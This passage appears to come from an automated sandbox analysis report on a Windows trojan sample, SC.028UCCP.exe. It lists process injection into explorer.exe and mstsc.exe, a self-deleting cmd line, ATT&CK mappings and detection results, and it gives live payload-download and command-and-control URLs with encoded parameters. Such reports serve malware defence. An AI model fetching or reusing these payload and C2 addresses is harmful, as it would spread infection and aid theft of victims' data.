          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4D2EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E732C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F232C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E742AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E742AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E492AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F2B2BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F2B2BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F2B2BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F2B2BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4C2B0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F192AB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_100015D0 Free,LdrInitializeThunk,VirtualFree,GlobalFree,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 165.160.15.20 80
          Source: C:\Windows\explorer.exeNetwork Connect: 206.233.207.174 80
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.185.211 80
          Source: C:\Windows\explorer.exeNetwork Connect: 183.181.96.18 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.187.111.221 80
          Source: C:\Windows\explorer.exeNetwork Connect: 13.248.157.32 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 217.26.48.101 80
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.147 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.186.51 80
          Source: C:\Windows\explorer.exeNetwork Connect: 169.60.232.139 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.39.114 80
          Source: C:\Users\user\Desktop\SC.028UCCP.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 870000
          Source: C:\Users\user\Desktop\SC.028UCCP.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SC.028UCCP.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SC.028UCCP.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SC.028UCCP.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\SC.028UCCP.exeThread register set: target process: 4768
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 4768
          Source: C:\Users\user\Desktop\SC.028UCCP.exeProcess created: C:\Users\user\Desktop\SC.028UCCP.exe C:\Users\user\Desktop\SC.028UCCP.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\SC.028UCCP.exe"
          Source: explorer.exe, 00000007.00000000.2906971222.000000000D89D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.7451826798.0000000004D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405BBA GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API
          1
          DLL Side-Loading
          512
          Process Injection
          1
          Rootkit
          1
          Credential API Hooking
          121
          Security Software Discovery
          Remote Services1
          Credential API Hooking
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Masquerading
          LSASS Memory12
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth3
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)12
          Virtualization/Sandbox Evasion
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin Shares1
          Clipboard Data
          Automated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer113
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets2
          File and Directory Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Obfuscated Files or Information
          Cached Domain Credentials4
          System Information Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830301 Sample: SC.028UCCP.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 34 www.triknblog.net 2->34 36 www.top-promotion.net 2->36 38 24 other IPs or domains 2->38 58 Snort IDS alert for network traffic 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 4 other signatures 2->64 11 SC.028UCCP.exe 2 35 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\...\Patter.Lam, data 11->30 dropped 32 C:\Users\user\AppData\Local\...\System.dll, PE32 11->32 dropped 72 Tries to detect Any.run 11->72 15 SC.028UCCP.exe 6 11->15         started        signatures6 process7 dnsIp8 46 195.133.40.46, 49810, 80 SPD-NETTR Russian Federation 15->46 48 192.168.11.1 unknown unknown 15->48 50 Modifies the context of a thread in another process (thread injection) 15->50 52 Tries to detect Any.run 15->52 54 Maps a DLL or memory area into another process 15->54 56 2 other signatures 15->56 19 explorer.exe 5 1 15->19 injected signatures9 process10 dnsIp11 40 www.findyellowfreightjobs.com 169.60.232.139, 49844, 80 SOFTLAYERUS United States 19->40 42 www.triknblog.net 183.181.96.18, 49846, 80 SAKURA-CSAKURAInternetIncJP Japan 19->42 44 12 other IPs or domains 19->44 66 System process connects to network (likely due to code injection or exploit) 19->66 23 mstsc.exe 19->23         started        signatures12 process13 signatures14 68 Modifies the context of a thread in another process (thread injection) 23->68 70 Maps a DLL or memory area into another process 23->70 26 cmd.exe 1 23->26         started        process15 process16 28 conhost.exe 26->28         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          SC.028UCCP.exe51%VirustotalBrowse
          SC.028UCCP.exe33%ReversingLabsWin32.Trojan.Generic
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsc7F31.tmp\System.dll0%ReversingLabs
          SourceDetectionScannerLabelLinkDownload
          8.2.mstsc.exe.50cf840.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          8.2.mstsc.exe.2f43518.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.2.explorer.exe.13c7f840.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          SourceDetectionScannerLabelLink
          amyjohnsonrealtor.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://195.133.40.46/CsPlxqjFa224.bin00%Avira URL Cloudsafe
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
          http://195.133.40.46/CsPlxqjFa224.bin30%Avira URL Cloudsafe
          http://www.economjchq.space/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=GEgy5f1eXaBWyRpWMBxBbWcEY1MHcvciQ8raEzEPejcDf7w8zE5rQdkYfLeQVLgbPBXb0%Avira URL Cloudsafe
          http://www.findyellowfreightjobs.com/ms12/?hT=G6LllRn2UhCgoj9/NoDttLpXGK4pGwfwFGBz2EgLi6yWMZIZhDysno0vSCCcnKmdw4QQ&UlWl0=MBZlMJlh34CHQ0%Avira URL Cloudsafe
          http://www.amyjohnsonrealtor.com/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=KsItnxjux7GTZO7TUTKtm8QLzBBO9NcCFMwewp8NtohxkT6a6dLohlItrjGlglAawoap0%Avira URL Cloudsafe
          http://www.hospitalityhsia.com/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=i6mctz/lYNz9iKxESYWey4cK6TMKWjJsbrWHZTfqTQLBeE+tWIBGneMXWwL4vjyr8Zpy0%Avira URL Cloudsafe
          http://www.triknblog.net/ms12/?hT=lfzlfRYQFuadehd27GXthwlbqohm3e93HBX/EbDE1KV1AljB6VPD+GnlvvGiXqJ/lo6n&UlWl0=MBZlMJlh34CHQ0%Avira URL Cloudsafe
          https://www.laposadaapts.com/ms12/?hT=vo99NxIlv9atltQAf50%Avira URL Cloudsafe
          http://www.friendsofquarepianos.co.uk/ms12/?hT=rKVQxN6JSordSXvKLLfEBVUre63ztGesQlGfCtix5zz1Yo/EERiTRw3ZQxg6mz/OTP1R&a6A8=p0GhgVm0MHDdp8m0%Avira URL Cloudsafe
          http://195.133.40.46/CsPlxqjFa224.bin0%Avira URL Cloudsafe
          http://www.drugtestingservices.co.uk/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=dB2SKHnvFm/evHV5UtSyv0UoYXCrydohCzjDkTmDf/VJc0uDcAnYtxnT/Jo2TNbLuMGT0%Avira URL Cloudsafe
          http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
          https://excel.office.coma0%Avira URL Cloudsafe
          http://www.conscienciaretroprogresiva.com/ms12/?hT=YOOWDLIFFjmzpH1SAG7YZM+LVKYOCEYmA0eV1woM6pvlajKzKUVwFam52RyaFl1jbOMY&UlWl0=MBZlMJlh34CHQ0%Avira URL Cloudsafe
          http://schemas.micro0%Avira URL Cloudsafe
          http://195.133.40.46/G0%Avira URL Cloudsafe
          http://195.133.40.46/0%Avira URL Cloudsafe
          www.eliteequinewellness.com/ms12/0%Avira URL Cloudsafe
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
          http://195.133.40.46/CsPlxqjFa224.binU0%Avira URL Cloudsafe
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
          http://www.arialttnr.com/ms12/?hT=aVqkBEdIHBWaW/lsOPNfNUdw5ZC180ox2ANf6BVSo52uRq15en0/dTfjz5sq7L16GRwO&a6A8=p0GhgVm0MHDdp8m0%Avira URL Cloudsafe
          http://195.133.40.46/CsPlxqjFa224.bin~0%Avira URL Cloudsafe
          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
          http://www.paparazirestaurant.co.uk/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=qQKx9PCKTcR0X3fJLav3D/FI6bogqcX+QhlqDFXKzmg3lH7RMn/qXLrYouNPLK8mW2//0%Avira URL Cloudsafe
          http://www.eliteequinewellness.com/ms12/?hT=3vbl2R1UVlik5qBB6wrenITxXeLVrWa6N7N62KRalH+vVSA16yD/agKPQdEyB3rsS7Yj&a6A8=p0GhgVm0MHDdp8m0%Avira URL Cloudsafe
          http://www.lists-cellphones.life/ms12/?hT=XQDAKTxCfPAtZ1kZf5EiiDFWaFS1BQmSMuwLBzPPFACL8OgktJOl440I6bHrpdhUiEnu&a6A8=p0GhgVm0MHDdp8m0%Avira URL Cloudsafe
          http://www.garageautosaintthomas.com/ms12/?hT=rnwHnBjC2B91WSvUx5IF3sWIhMPrpsyX3rQSnskEXaZlLwDtCWtuXGHAHocTRNCypERK&a6A8=p0GhgVm0MHDdp8m0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.lists-cellphones.life
          104.21.39.114
          truetrue
            unknown
            www.friendsofquarepianos.co.uk
            81.17.29.147
            truetrue
              unknown
              www.economjchq.space
              188.114.97.3
              truetrue
                unknown
                amyjohnsonrealtor.com
                13.248.157.32
                truetrueunknown
                www.hospitalityhsia.com
                206.233.207.174
                truetrue
                  unknown
                  conscienciaretroprogresiva.com
                  34.102.136.180
                  truefalse
                    unknown
                    www.triknblog.net
                    183.181.96.18
                    truetrue
                      unknown
                      www.paparazirestaurant.co.uk
                      192.187.111.221
                      truetrue
                        unknown
                        www.findyellowfreightjobs.com
                        169.60.232.139
                        truetrue
                          unknown
                          www.drugtestingservices.co.uk
                          165.160.15.20
                          truetrue
                            unknown
                            www.abimpianti.ch
                            217.26.48.101
                            truetrue
                              unknown
                              ext-sq.squarespace.com
                              198.185.159.144
                              truefalse
                                high
                                ghs.googlehosted.com
                                142.250.185.211
                                truefalse
                                  unknown
                                  www.goverifyvin.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    97.97.242.52.in-addr.arpa
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.top-promotion.net
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.amyjohnsonrealtor.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.conscienciaretroprogresiva.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.eliteequinewellness.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.arialttnr.com
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.garageautosaintthomas.com
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.laposadaapts.com
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.eeccu.info
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      www.thinkdev.africa
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.friendsofquarepianos.co.uk/ms12/?hT=rKVQxN6JSordSXvKLLfEBVUre63ztGesQlGfCtix5zz1Yo/EERiTRw3ZQxg6mz/OTP1R&a6A8=p0GhgVm0MHDdp8mtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.hospitalityhsia.com/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=i6mctz/lYNz9iKxESYWey4cK6TMKWjJsbrWHZTfqTQLBeE+tWIBGneMXWwL4vjyr8Zpytrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.findyellowfreightjobs.com/ms12/?hT=G6LllRn2UhCgoj9/NoDttLpXGK4pGwfwFGBz2EgLi6yWMZIZhDysno0vSCCcnKmdw4QQ&UlWl0=MBZlMJlh34CHQtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.economjchq.space/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=GEgy5f1eXaBWyRpWMBxBbWcEY1MHcvciQ8raEzEPejcDf7w8zE5rQdkYfLeQVLgbPBXbtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.amyjohnsonrealtor.com/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=KsItnxjux7GTZO7TUTKtm8QLzBBO9NcCFMwewp8NtohxkT6a6dLohlItrjGlglAawoaptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.triknblog.net/ms12/?hT=lfzlfRYQFuadehd27GXthwlbqohm3e93HBX/EbDE1KV1AljB6VPD+GnlvvGiXqJ/lo6n&UlWl0=MBZlMJlh34CHQtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://195.133.40.46/CsPlxqjFa224.bintrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.drugtestingservices.co.uk/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=dB2SKHnvFm/evHV5UtSyv0UoYXCrydohCzjDkTmDf/VJc0uDcAnYtxnT/Jo2TNbLuMGTtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.conscienciaretroprogresiva.com/ms12/?hT=YOOWDLIFFjmzpH1SAG7YZM+LVKYOCEYmA0eV1woM6pvlajKzKUVwFam52RyaFl1jbOMY&UlWl0=MBZlMJlh34CHQfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        www.eliteequinewellness.com/ms12/true
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://www.arialttnr.com/ms12/?hT=aVqkBEdIHBWaW/lsOPNfNUdw5ZC180ox2ANf6BVSo52uRq15en0/dTfjz5sq7L16GRwO&a6A8=p0GhgVm0MHDdp8mfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.eliteequinewellness.com/ms12/?hT=3vbl2R1UVlik5qBB6wrenITxXeLVrWa6N7N62KRalH+vVSA16yD/agKPQdEyB3rsS7Yj&a6A8=p0GhgVm0MHDdp8mfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.paparazirestaurant.co.uk/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=qQKx9PCKTcR0X3fJLav3D/FI6bogqcX+QhlqDFXKzmg3lH7RMn/qXLrYouNPLK8mW2//true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.lists-cellphones.life/ms12/?hT=XQDAKTxCfPAtZ1kZf5EiiDFWaFS1BQmSMuwLBzPPFACL8OgktJOl440I6bHrpdhUiEnu&a6A8=p0GhgVm0MHDdp8mtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.garageautosaintthomas.com/ms12/?hT=rnwHnBjC2B91WSvUx5IF3sWIhMPrpsyX3rQSnskEXaZlLwDtCWtuXGHAHocTRNCypERK&a6A8=p0GhgVm0MHDdp8mtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000007.00000000.2898033699.000000000996D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://195.133.40.46/CsPlxqjFa224.bin3SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://195.133.40.46/CsPlxqjFa224.bin0SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.laposadaapts.com/ms12/?hT=vo99NxIlv9atltQAf5explorer.exe, 00000007.00000002.7485227128.000000001416F000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://nsis.sf.net/NSIS_ErrorErrorSC.028UCCP.exe, 00000000.00000000.2396678614.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000006.00000000.2747209758.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                            high
                                                            http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDSC.028UCCP.exe, 00000006.00000001.2747874116.0000000000626000.00000020.00000001.01000000.00000007.sdmpfalse
                                                              high
                                                              http://schemas.microexplorer.exe, 00000007.00000002.7445959237.0000000002C70000.00000002.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.gopher.ftp://ftp.SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://outlook.comexplorer.exe, 00000007.00000000.2906971222.000000000D89D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                https://excel.office.comaexplorer.exe, 00000007.00000000.2906971222.000000000D89D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://195.133.40.46/GSC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdSC.028UCCP.exe, 00000006.00000001.2747874116.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://api.msn.com/jexplorer.exe, 00000007.00000003.3115928229.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4196973708.000000000D7B8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://nsis.sf.net/NSIS_ErrorSC.028UCCP.exe, SC.028UCCP.exe, 00000000.00000000.2396678614.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000006.00000000.2747209758.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                    high
                                                                    http://195.133.40.46/SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C7B000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C5B000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://195.133.40.46/CsPlxqjFa224.binUSC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdSC.028UCCP.exe, 00000006.00000001.2747874116.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://195.133.40.46/CsPlxqjFa224.bin~SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://api.msn.com/explorer.exe, 00000007.00000003.3115928229.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4196973708.000000000D7B8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      165.160.15.20
                                                                      www.drugtestingservices.co.ukUnited States
                                                                      19574CSCUStrue
                                                                      195.133.40.46
                                                                      unknownRussian Federation
                                                                      57844SPD-NETTRtrue
                                                                      206.233.207.174
                                                                      www.hospitalityhsia.comUnited States
                                                                      174COGENT-174UStrue
                                                                      142.250.185.211
                                                                      ghs.googlehosted.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      183.181.96.18
                                                                      www.triknblog.netJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                      192.187.111.221
                                                                      www.paparazirestaurant.co.ukUnited States
                                                                      33387NOCIXUStrue
                                                                      13.248.157.32
                                                                      amyjohnsonrealtor.comUnited States
                                                                      16509AMAZON-02UStrue
                                                                      198.185.159.144
                                                                      ext-sq.squarespace.comUnited States
                                                                      53831SQUARESPACEUSfalse
                                                                      217.26.48.101
                                                                      www.abimpianti.chSwitzerland
                                                                      29097HOSTPOINT-ASCHtrue
                                                                      188.114.97.3
                                                                      www.economjchq.spaceEuropean Union
                                                                      13335CLOUDFLARENETUStrue
                                                                      81.17.29.147
                                                                      www.friendsofquarepianos.co.ukSwitzerland
                                                                      51852PLI-ASCHtrue
                                                                      34.102.136.180
                                                                      conscienciaretroprogresiva.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      142.250.186.51
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      169.60.232.139
                                                                      www.findyellowfreightjobs.comUnited States
                                                                      36351SOFTLAYERUStrue
                                                                      104.21.39.114
                                                                      www.lists-cellphones.lifeUnited States
                                                                      13335CLOUDFLARENETUStrue
                                                                      IP
                                                                      192.168.11.1
                                                                      Joe Sandbox Version:37.0.0 Beryl
                                                                      Analysis ID:830301
                                                                      Start date and time:2023-03-20 09:06:32 +01:00
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 16m 34s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Cookbook file name:default.jbs
